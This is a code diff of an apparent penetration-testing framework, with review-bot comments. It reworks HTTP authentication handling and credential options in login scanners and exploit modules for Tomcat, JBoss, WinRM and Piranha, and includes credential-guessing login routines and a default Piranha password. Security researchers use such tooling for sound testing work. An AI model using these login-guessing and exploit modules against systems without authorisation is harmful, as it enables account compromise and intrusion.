@@ -220,46 +181,53 @@ def request_raw(opts={}) req << set_raw_headers(c_rawh) req << set_body(c_body) - request = Request.new - request.parse(req) - request.options = opts - - request + req end # # Create a CGI compatible request # - # @param (see #request_raw) - # @option opts (see #request_raw) - # @option opts 'ctype' [String] Content-Type header value, default: +application/x-www-form-urlencoded+ - # @option opts 'encode_params' [Bool] URI encode the GET or POST variables (names and values), default: true - # @option opts 'vars_get' [Hash] GET variables as a hash to be translated into a query string - # @option opts 'vars_post' [Hash] POST variables as a hash to be translated into POST data + # Options: + # - agent: User-Agent header value + # - basic_auth: Basic-Auth header value + # - connection: Connection header value + # - cookie: Cookie header value + # - ctype: Content-Type header value, default: +application/x-www-form-urlencoded+ + # - data: HTTP data (only useful with some methods, see rfc2616) + # - encode: URI encode the supplied URI, default: false + # - encode_params: URI encode the GET or POST variables (names and values), default: true + # - headers: HTTP headers as a hash, e.g. 
<code>{ "X-MyHeader" => "value" }</code> + # - method: HTTP method to use in the request, not limited to standard methods defined by rfc2616, default: GET + # - proto: protocol, default: HTTP + # - query: raw query string + # - raw_headers: HTTP headers as a hash + # - uri: the URI to request + # - vars_get: GET variables as a hash to be translated into a query string + # - vars_post: POST variables as a hash to be translated into POST data + # - version: version of the protocol, default: 1.1 + # - vhost: Host header value # - # @return [Request] def request_cgi(opts={}) - c_ag = opts['agent'] || config['agent'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - c_body = opts['data'] || '' - c_cgi = opts['uri'] || '/' - c_conn = opts['connection'] - c_cook = opts['cookie'] || config['cookie'] c_enc = opts['encode'] || false c_enc_p = (opts['encode_params'] == true or opts['encode_params'].nil? ? true : false) - c_head = opts['headers'] || config['headers'] || {} - c_host = opts['vhost'] || config['vhost'] + c_cgi = opts['uri'] || '/' + c_body = opts['data'] || '' c_meth = opts['method'] || 'GET' - c_path = opts['path_info'] c_prot = opts['proto'] || 'HTTP' + c_vers = opts['version'] || config['version'] || '1.1' c_qs = opts['query'] || '' - c_rawh = opts['raw_headers'] || config['raw_headers'] || '' - c_type = opts['ctype'] || 'application/x-www-form-urlencoded' c_varg = opts['vars_get'] || {} c_varp = opts['vars_post'] || {} - c_vers = opts['version'] || config['version'] || '1.1' - + c_head = opts['headers'] || config['headers'] || {} + c_rawh = opts['raw_headers'] || config['raw_headers'] || '' + c_type = opts['ctype'] || 'application/x-www-form-urlencoded' + c_ag = opts['agent'] || config['agent'] + c_cook = opts['cookie'] || config['cookie'] + c_host = opts['vhost'] || config['vhost'] + c_conn = opts['connection'] + c_path = opts['path_info'] + c_auth = opts['basic_auth'] || config['basic_auth'] || '' uri = set_cgi(c_cgi) qstr = c_qs pstr = c_body 
@@ -275,7 +243,7 @@ def request_cgi(opts={}) c_varg.each_pair do |var,val| qstr << '&' if qstr.length > 0 - qstr << (c_enc_p ? set_encode_uri(var) : var) + qstr << (c_enc_p ? set_encode_uri(var) : var) qstr << '=' qstr << (c_enc_p ? set_encode_uri(val) : val) end @@ -317,9 +285,7 @@ def request_cgi(opts={}) req << set_agent_header(c_ag) if (c_auth.length > 0) - unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" - req << set_basic_auth_header(c_auth) - end + req << set_basic_auth_header(c_auth) end req << set_cookie_header(c_cook) @@ -332,19 +298,12 @@ def request_cgi(opts={}) req << set_raw_headers(c_rawh) req << set_body(pstr) - request = Request.new - request.parse(req) - request.options = opts - - request + req end # # Connects to the remote server if possible. # - # @param t [Fixnum] Timeout - # @see Rex::Socket::Tcp.create - # @return [Rex::Socket::Tcp] def connect(t = -1) # If we already have a connection and we aren't pipelining, close it. if (self.conn) @@ -382,31 +341,12 @@ def close self.conn = nil end - # - # Sends a request and gets a response back - # - # If the request is a 401, and we have creds, it will attempt to complete - # authentication and return the final response - # - def send_recv(req, t = -1, persist=false) - res = _send_recv(req,t,persist) - if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? - res = send_auth(res, req.options, t, persist) - end - res - end - # # Transmit an HTTP request and receive the response + # If persist is set, then the request will attempt + # to reuse an existing connection. # - # If persist is set, then the request will attempt to reuse an existing - # connection. - # - # Call this directly instead of {#send_recv} if you don't want automatic - # authentication handling. - # - # @return [Response] - def _send_recv(req, t = -1, persist=false) + def send_recv(req, t = -1, persist=false) @pipeline = persist send_request(req, t) res = read_response(t) 
@@ -417,332 +357,11 @@ def _send_recv(req, t = -1, persist=false) # # Send an HTTP request to the server # - # @param req [Request,#to_s] The request to send - # @param t (see #connect) def send_request(req, t = -1) connect(t) conn.put(req.to_s) end - # Validates that the client has creds - def have_creds? - !(self.username.nil?) && self.username != '' - end - - # - # Params - - # res = The 401 response we need to auth from - # opts = the opts used to generate the request that created this response - # t = the timeout for the http requests - # persist = whether to persist the tcp connection for HTTP Pipelining - # - # Parses the response for what Authentication methods are supported. - # Sets the corect authorization options and passes them on to the correct - # method for sending the next request. - def send_auth(res, opts, t, persist) - supported_auths = res.headers['WWW-Authenticate'] - if supported_auths.include? 'Basic' - if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(self.username,self.password) - else - opts['headers'] = { 'Authorization' => basic_auth_header(self.username,self.password)} - end - - req = request_cgi(opts) - res = _send_recv(req,t,persist) - return res - elsif supported_auths.include? "Digest" - opts['DigestAuthUser'] = self.username.to_s - opts['DigestAuthPassword'] = self.password.to_s - temp_response = digest_auth(opts) - if temp_response.kind_of? Rex::Proto::Http::Response - res = temp_response - end - return res - elsif supported_auths.include? "NTLM" - opts['provider'] = 'NTLM' - temp_response = negotiate_auth(opts) - if temp_response.kind_of? Rex::Proto::Http::Response - res = temp_response - end - return res - elsif supported_auths.include? "Negotiate" - opts['provider'] = 'Negotiate' - temp_response = negotiate_auth(opts) - if temp_response.kind_of? 
Rex::Proto::Http::Response - res = temp_response - end - return res - end - return res - end - - # Converts username and password into the HTTP Basic - # authorization string. - def basic_auth_header(username,password) - auth_str = username.to_s + ":" + password.to_s - auth_str = "Basic " + Rex::Text.encode_base64(auth_str) - end - - - # - # Opts - - # Inherits all the same options as send_request_cgi - # Also expects some specific opts - # DigestAuthUser - The username for DigestAuth - # DigestAuthPass - The password for DigestAuth - # DigestAuthIIS - IIS uses a slighlty different implementation, set this for IIS support - # - # This method builds new request to complete a Digest Authentication cycle. - # We do not persist the original connection , to clear state in preparation for our auth - # We do persist the rest of the connection stream because Digest is a tcp session - # based authentication method. - # - - def digest_auth(opts={}) - @nonce_count = 0 - - to = opts['timeout'] || 20 - - digest_user = opts['DigestAuthUser'] || "" - digest_password = opts['DigestAuthPassword'] || "" - - method = opts['method'] - path = opts['uri'] - iis = true - if (opts['DigestAuthIIS'] == false or self.config['DigestAuthIIS'] == false) - iis = false - end - - begin - @nonce_count += 1 - - resp = opts['response'] - - if not resp - # Get authentication-challenge from server, and read out parameters required - r = request_cgi(opts.merge({ - 'uri' => path, - 'method' => method })) - resp = _send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - - if resp.code != 401 - return resp - end - return resp unless resp.headers['WWW-Authenticate'] - end - - # Don't anchor this regex to the beginning of string because header - # folding makes it appear later when the server presents multiple - # WWW-Authentication options (such as is the case with IIS configured - # for Digest or NTLM). 
- resp['www-authenticate'] =~ /Digest (.*)/ - - parameters = {} - $1.split(/,[[:space:]]*/).each do |p| - k, v = p.split("=", 2) - parameters[k] = v.gsub('"', '') - end - - qop = parameters['qop'] - - if parameters['algorithm'] =~ /(.*?)(-sess)?$/ - algorithm = case $1 - when 'MD5' then Digest::MD5 - when 'SHA1' then Digest::SHA1 - when 'SHA2' then Digest::SHA2 - when 'SHA256' then Digest::SHA256 - when 'SHA384' then Digest::SHA384 - when 'SHA512' then Digest::SHA512 - when 'RMD160' then Digest::RMD160 - else raise Error, "unknown algorithm \"#{$1}\"" - end - algstr = parameters["algorithm"] - sess = $2 - else - algorithm = Digest::MD5 - algstr = "MD5" - sess = false - end - - a1 = if sess then - [ - algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), - parameters['nonce'], - @cnonce - ].join ':' - else - "#{digest_user}:#{parameters['realm']}:#{digest_password}" - end - - ha1 = algorithm.hexdigest(a1) - ha2 = algorithm.hexdigest("#{method}:#{path}") - - request_digest = [ha1, parameters['nonce']] - request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop - request_digest << ha2 - request_digest = request_digest.join ':' - - # Same order as IE7 - auth = [ - "Digest username=\"#{digest_user}\"", - "realm=\"#{parameters['realm']}\"", - "nonce=\"#{parameters['nonce']}\"", - "uri=\"#{path}\"", - "cnonce=\"#{@cnonce}\"", - "nc=#{'%08x' % @nonce_count}", - "algorithm=#{algstr}", - "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", - # The spec says the qop value shouldn't be enclosed in quotes, but - # some versions of IIS require it and Apache accepts it. Chrome - # and Firefox both send it without quotes but IE does it this way. - # Use the non-compliant-but-everybody-does-it to be as compatible - # as possible by default. The user can override if they don't like - # it. - if qop.nil? then - elsif iis then - "qop=\"#{qop}\"" - else - "qop=#{qop}" - end, - if parameters.key? 
'opaque' then - "opaque=\"#{parameters['opaque']}\"" - end - ].compact - - headers ={ 'Authorization' => auth.join(', ') } - headers.merge!(opts['headers']) if opts['headers'] - - # Send main request with authentication - r = request_cgi(opts.merge({ - 'uri' => path, - 'method' => method, - 'headers' => headers })) - resp = _send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - - return resp - - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - - # - # Opts - - # Inherits all the same options as send_request_cgi - # provider - What Negotiate Provider to use (supports NTLM and Negotiate) - # - # Builds a series of requests to complete Negotiate Auth. Works essentially - # the same way as Digest auth. Same pipelining concerns exist. - # - - def negotiate_auth(opts={}) - ntlm_options = { - :signing => false, - :usentlm2_session => self.config['usentlm2_session'], - :use_ntlmv2 => self.config['use_ntlmv2'], - :send_lm => self.config['send_lm'], - :send_ntlm => self.config['send_ntlm'] - } - - to = opts['timeout'] || 20 - opts['username'] ||= self.username.to_s - opts['password'] ||= self.password.to_s - - if opts['provider'] and opts['provider'].include? 'Negotiate' - provider = "Negotiate " - else - provider = 'NTLM ' - end - - opts['method']||= 'GET' - opts['headers']||= {} - - ntlmssp_flags = ::Rex::Proto::NTLM::Utils.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = self.config['domain'] - - b64_blob = Rex::Text::encode_base64( - ::Rex::Proto::NTLM::Utils::make_ntlmssp_blob_init( - domain_name, - workstation_name, - ntlmssp_flags - )) - - ntlm_message_1 = provider + b64_blob - - begin - # First request to get the challenge - opts['headers']['Authorization'] = ntlm_message_1 - r = request_cgi(opts) - resp = _send_recv(r, to) - unless resp.kind_of? 
Rex::Proto::Http::Response - return nil - end - - return resp unless resp.code == 401 && resp.headers['WWW-Authenticate'] - - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/i).flatten[0] - return resp unless ntlm_challenge - - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = ::Rex::Proto::NTLM::Utils.parse_ntlm_type_2_blob(ntlm_message_2) - - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - default_name = blob_data[:default_name] || '' #netbios name - default_domain = blob_data[:default_domain] || '' #netbios domain - dns_host_name = blob_data[:dns_host_name] || '' #dns name - dns_domain_name = blob_data[:dns_domain_name] || '' #dns domain - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' #Client time - - spnopt = {:use_spn => self.config['SendSPN'], :name => self.hostname} - - resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = ::Rex::Proto::NTLM::Utils.create_lm_ntlm_responses( - opts['username'], - opts['password'], - challenge_key, - domain_name, - default_name, - default_domain, - dns_host_name, - dns_domain_name, - chall_MsvAvTimestamp, - spnopt, - ntlm_options - ) - - ntlm_message_3 = ::Rex::Proto::NTLM::Utils.make_ntlmssp_blob_auth( - domain_name, - workstation_name, - opts['username'], - resp_lm, - resp_ntlm, - '', - ntlmssp_flags - ) - - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - - # Send the response - opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3}" - r = request_cgi(opts) - resp = _send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - return resp - - rescue ::Errno::EPIPE, ::Timeout::Error - return nil - end - end # # Read a response from the server # 
@@ -1220,9 +839,6 @@ def set_formatted_header(var, val) # attr_accessor :proxies - # Auth - attr_accessor :username, :password - # When parsing the request, thunk off the first response from the server, since junk attr_accessor :junk_pipeline diff --git a/lib/rex/proto/http/request.rb b/lib/rex/proto/http/request.rb index af88fdcb68da..45d13b2baed4 100644 --- a/lib/rex/proto/http/request.rb +++ b/lib/rex/proto/http/request.rb @@ -48,8 +48,6 @@ def initialize(uri = '/', proto = DefaultProtocol) end end - attr_accessor :options - # # Initializes an instance of an HTTP request with the supplied method, URI, # and protocol. diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb index 6f63b7b95d0d..8b114dbdd874 100644 --- a/modules/auxiliary/gather/shodan_search.rb +++ b/modules/auxiliary/gather/shodan_search.rb @@ -38,10 +38,10 @@ def initialize(info = {}) )) # disabling all the unnecessary options that someone might set to break our query - deregister_options('RPORT','RHOST', 'DOMAIN', + deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', - 'NTLM::UseNTLMv2', 'SSL') + 'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL') register_options( [ diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index 9486262be789..fd57fda9bbfe 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb 
@@ -26,7 +26,7 @@ def initialize(info={}) 'Name' => 'Cisco Device HTTP Device Manager Access', 'Description' => %q{ This module gathers data from a Cisco device (router or switch) with the device manager - web interface exposed. The USERNAME and PASSWORD options can be used to specify + web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify authentication. }, 'Author' => [ 'hdm' ], @@ -61,7 +61,7 @@ def run_host(ip) print_good("#{rhost}:#{rport} Successfully authenticated to this device") # Report a vulnerability only if no password was specified - if datastore['PASSWORD'].to_s.length == 0 + if datastore['BasicAuthPass'].to_s.length == 0 report_vuln( { diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 076bb36d70f6..5a6b0ab9a617 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -26,7 +26,7 @@ def initialize [ ], - 'Author' => [ 'hdm' , 'thelightcosine'], + 'Author' => [ 'hdm' ], 'References' => [ [ 'CVE', '1999-0502'] # Weak password @@ -48,7 +48,9 @@ def initialize register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ]) end - def find_auth_uri + def find_auth_uri_and_scheme + + path_and_scheme = [] if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0 paths = [datastore['AUTH_URI']] else @@ -78,9 +80,21 @@ def find_auth_uri next if not res end - return path + next if not res.code == 401 + next if not res.headers['WWW-Authenticate'] + path_and_scheme << path + case res.headers['WWW-Authenticate'] + when /Basic/i + path_and_scheme << "Basic" + when /NTLM/i + path_and_scheme << "NTLM" + when /Digest/i + path_and_scheme << "Digest" + end + return path_and_scheme end + return path_and_scheme end def target_url 
@@ -97,7 +111,7 @@ def run_host(ip) print_error("You need need to set AUTH_URI when using PUT Method !") return end - @uri = find_auth_uri() + @uri, @scheme = find_auth_uri_and_scheme() if ! @uri print_error("#{target_url} No URI found that asks for HTTP authentication") return @@ -105,7 +119,12 @@ def run_host(ip) @uri = "/#{@uri}" if @uri[0,1] != "/" - print_status("Attempting to login to #{target_url}") + if ! @scheme + print_error("#{target_url} Incompatible authentication scheme") + return + end + + print_status("Attempting to login to #{target_url} with #{@scheme} authentication") each_user_pass { |user, pass| do_login(user, pass) @@ -114,23 +133,27 @@ def run_host(ip) def do_login(user='admin', pass='admin') vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'") + success = false + proof = "" + + ret = do_http_login(user,pass,@scheme) + return :abort if ret == :abort + if ret == :success + proof = @proof.dup + success = true + end - response = do_http_login(user,pass) - result = determine_result(response) - - return :abort if result == :abort - - if result == :success + if success print_good("#{target_url} - Successful login '#{user}' : '#{pass}'") any_user = false any_pass = false vprint_status("#{target_url} - Trying random username with password:'#{pass}'") - any_user = determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass)) + any_user = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme) vprint_status("#{target_url} - Trying username:'#{user}' with random password") - any_pass = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8))) + any_pass = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme) if any_user == :success user = "anyuser" 
@@ -152,7 +175,7 @@ def do_login(user='admin', pass='admin')
 :sname => (ssl ? 'https' : 'http'),
 :user => user,
 :pass => pass,
- :proof => "WEBAPP=\"Generic\", PROOF=#{response.to_s}",
+ :proof => "WEBAPP=\"Generic\", PROOF=#{proof}",
 :source_type => "user_supplied",
 :active => true
 )
@@ -165,28 +188,143 @@ def do_login(user='admin', pass='admin') end end - def do_http_login(user,pass) + def do_http_login(user,pass,scheme) + case scheme + when /NTLM/i + do_http_auth_ntlm(user,pass) + when /Digest/i + do_http_auth_digest(user,pass,datastore['REQUESTTYPE']) + when /Basic/i + do_http_auth_basic(user,pass) + else + vprint_error("#{target_url}: Unknown authentication scheme") + return :abort + end + end + + def do_http_auth_ntlm(user,pass) begin - response = send_request_cgi({ + resp,c = send_http_auth_ntlm( 'uri' => @uri, - 'method' => datastore['REQUESTTYPE'], 'username' => user, 'password' => pass - }) - return response + ) + c.close + return :abort if (resp.code == 404) + + if [200, 301, 302].include?(resp.code) + @proof = resp + return :success + end + rescue ::Rex::ConnectionError vprint_error("#{target_url} - Failed to connect to the web server") - return nil + return :abort end + + return :fail end - def determine_result(response) - return :abort unless response.kind_of? Rex::Proto::Http::Response - return :abort unless response.code - return :success if [200, 301, 302].include?(response.code) + def do_http_auth_basic(user,pass) + user_pass = Rex::Text.encode_base64(user + ":" + pass) + + begin + res = send_request_cgi({ + 'uri' => @uri, + 'method' => 'GET', + 'headers' => + { + 'Authorization' => "Basic #{user_pass}", + } + }, 25) + + unless (res.kind_of? 
Rex::Proto::Http::Response) + vprint_error("#{target_url} not responding") + return :abort + end + + return :abort if (res.code == 404) + + if [200, 301, 302].include?(res.code) + @proof = res + return :success + end + + rescue ::Rex::ConnectionError + vprint_error("#{target_url} - Failed to connect to the web server") + return :abort + end + return :fail end + def do_http_auth_digest(user,pass,requesttype) + path = datastore['AUTH_URI'] || "/" + begin + if requesttype == "PUT" + res,c = send_digest_request_cgi({ + 'uri' => path, + 'method' => requesttype, + 'data' => 'Test123\r\n', + #'DigestAuthIIS' => false, + 'DigestAuthUser' => user, + 'DigestAuthPassword' => pass + }, 25) + elsif requesttype == "PROPFIND" + res,c = send_digest_request_cgi({ + 'uri' => path, + 'method' => requesttype, + 'data' => '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>', + #'DigestAuthIIS' => false, + 'DigestAuthUser' => user, + 'DigestAuthPassword' => pass, + 'headers' => { 'Depth' => '0'} + }, 25) + else + res,c = send_digest_request_cgi({ + 'uri' => path, + 'method' => requesttype, + #'DigestAuthIIS' => false, + 'DigestAuthUser' => user, + 'DigestAuthPassword' => pass + }, 25) + end + + unless (res.kind_of? Rex::Proto::Http::Response) + vprint_error("#{target_url} not responding") + return :abort + end + + return :abort if (res.code == 404) + + if ( [200, 301, 302].include?(res.code) ) or (res.code == 201) + if ((res.code == 201) and (requesttype == "PUT")) + print_good("Trying to delete #{path}") + del_res,c = send_digest_request_cgi({ + 'uri' => path, + 'method' => 'DELETE', + 'DigestAuthUser' => user, + 'DigestAuthPassword' => pass + }, 25) + if not (del_res.code == 204) + print_error("#{path} could be created, but not deleted again. 
This may have been noisy ...") + end + end + @proof = res + return :success + end + + if (res.code == 207) and (requesttype == "PROPFIND") + @proof = res + return :success + end + + rescue ::Rex::ConnectionError + vprint_error("#{target_url} - Failed to connect to the web server") + return :abort + end + return :fail + end end diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 75f88e7ed3db..65ab691e66dd 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -87,6 +87,10 @@ def run_host(ip) vprint_error("http://#{rhost}:#{rport}#{uri} - No response") return end + if res.code != 401 + vprint_error("http://#{rhost}:#{rport} - Authorization not requested") + return + end each_user_pass { |user, pass| do_login(user, pass) @@ -103,8 +107,10 @@ def do_login(user='tomcat', pass='tomcat') res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'username' => user, - 'password' => pass + 'headers' => + { + 'Authorization' => "Basic #{user_pass}", + } }, 25) unless (res.kind_of? Rex::Proto::Http::Response) vprint_error("http://#{rhost}:#{rport}#{uri} not responding") diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index 88e9e717d605..12f0c7042250 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -40,6 +40,10 @@ def initialize def run_host(ip) + unless accepts_ntlm_auth + print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" + return + end streams = winrm_run_cmd(datastore['CMD']) return unless streams.class == Hash print_error streams['stderr'] unless streams['stderr'] == '' diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index 946903113efe..d8012fb723f9 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb 
+++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -39,8 +39,12 @@ module without SSL, the 'AllowUnencrypted' winrm option must be set. def run_host(ip) + unless accepts_ntlm_auth + print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" + return + end each_user_pass do |user, pass| - resp = send_winrm_request(test_request) + resp,c = send_request_ntlm(test_request) if resp.nil? print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out" return diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 0c5eeb627414..ed09cfd5830e 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -42,7 +42,12 @@ def initialize def run_host(ip) - resp = send_winrm_request(winrm_wql_msg(datastore['WQL'])) + unless accepts_ntlm_auth + print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" + return + end + + resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) if resp.nil? print_error "Got no reply from the server" return diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index 080803918b83..fda08e41c47f 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -84,7 +84,8 @@ def initialize(info = {}) 'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol']) ], self.class) - deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', + deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword', + 'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2') end diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index 4312fa2bd482..d87027cadb50 100644 
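Review bot: Inside `each_user_pass` in winrm_login.rb the second value returned by `send_request_ntlm(test_request)` is bound to `c` and never used, once per credential pair. do_http_auth_ntlm in http_login.rb closes the equivalent value with `c.close`, so if `c` is an open client here as well (send_request_ntlm is not defined on this page) every iteration leaves a connection behind until the scan ends. Add `c.close if c` once the response has been read. The same applies to the `resp,c = send_request_ntlm(...)` calls in winrm_wql.rb and winrm_script_exec.rb.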
--- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -72,8 +72,8 @@ def initialize(info = {}) register_options( [ - OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']), - OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q']), + OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']), + OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']), ], self.class) end @@ -96,7 +96,7 @@ def exploit end if res.code == 401 - print_error("401 Authorization Required! Our credentials were not accepted!") + print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!") elsif (res.code == 200 and res.body =~ /The passwords you supplied match/) print_status("Command successfully executed (according to the server).") end diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index 9f030bbbc2fe..565d73a293c1 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -227,7 +227,9 @@ def upload_exec(session,rpath) authmsg = res.headers['WWW-Authenticate'] end print_error("The remote server responded expecting authentication") - if authmsg + if datastore['BasicAuthUser'] and datastore['BasicAuthPass'] + print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser']) + elsif authmsg print_error("WWW-Authenticate: %s" % authmsg) end cleanup_instructions(rpath, name) # display cleanup info diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index f350fe498483..07d5eb2adaef 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb 
@@ -96,6 +96,9 @@ def initialize(info = {}) def exploit + datastore['BasicAuthUser'] = datastore['USERNAME'] + datastore['BasicAuthPass'] = datastore['PASSWORD'] + jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 2297b5256928..7c36c1fa1624 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -123,6 +123,9 @@ def auto_target def exploit + datastore['BasicAuthUser'] = datastore['USERNAME'] + datastore['BasicAuthPass'] = datastore['PASSWORD'] + jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 2757cb6e1322..a46cd2c033f5 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -112,6 +112,9 @@ def initialize(info = {}) end def check + datastore['BasicAuthUser'] = datastore['USERNAME'] + datastore['BasicAuthPass'] = datastore['PASSWORD'] + res = query_serverinfo disconnect return CheckCode::Unknown if res.nil? @@ -124,8 +127,8 @@ def check :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['USERNAME'], - :pass => datastore['PASSWORD'], + :user => datastore['BasicAuthUser'], + :pass => datastore['BasicAuthPass'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) @@ -161,6 +164,9 @@ def auto_target def exploit + datastore['BasicAuthUser'] = datastore['USERNAME'] + datastore['BasicAuthPass'] = datastore['PASSWORD'] + mytarget = target if (target.name =~ /Automatic/) mytarget = auto_target 
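Review bot: `datastore['BasicAuthUser'] = datastore['USERNAME']` at the top of `exploit` in jboss_bshdeployer.rb silently replaces any BasicAuthUser/BasicAuthPass value that was set explicitly, and writes nil when USERNAME is unset. The same two lines are repeated in jboss_maindeployer.rb, in both `check` and `exploit` of tomcat_mgr_deploy.rb, and in `go` of oracle_vm_agent_utl.rb, where they run on every call. Which option is meant to take precedence is not documented anywhere in these hunks. Guard the copy, `datastore['BasicAuthUser'] = datastore['USERNAME'] if datastore['USERNAME']`, and add a comment such as `# USERNAME/PASSWORD are the module's options; the HTTP client reads BasicAuthUser/BasicAuthPass`.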
